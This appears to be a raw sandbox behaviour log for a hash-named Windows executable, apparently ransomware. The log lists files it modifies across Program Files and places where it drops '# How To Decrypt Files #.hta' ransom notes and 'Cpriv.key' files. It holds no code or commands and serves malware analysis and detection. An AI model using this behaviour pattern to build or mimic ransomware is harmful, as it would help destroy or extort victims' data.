de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00097_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10301_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00453_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SPACE_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMSL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00560_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WITHCOMP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UNT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Library\Analysis\PROCDB.XLAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBHOME.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsfra.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\EXITEML.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00610_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01563_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099172.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Publisher.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-visual.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\DataServices\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\calendar.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00176_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00330_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0088542.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293240.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PROTTPLN.PPT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR14F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WSIDBR98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\gui\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Thatch.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\POST98SP.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-cli.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18200_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10335_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105266.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00466_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-next-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239951.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238333.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00241_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRAPH.HXS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Icons\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00346_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234001.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212219.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\ERROR.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Month_Calendar.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_postage_Thumbnail.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL082.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14710_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN082.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099190.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0156537.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\RELAY.CER de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALENDAR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\ONENOTE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Access.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\MSMAPI\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB10.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\QuizShow.potx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Earthy.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-search.xml 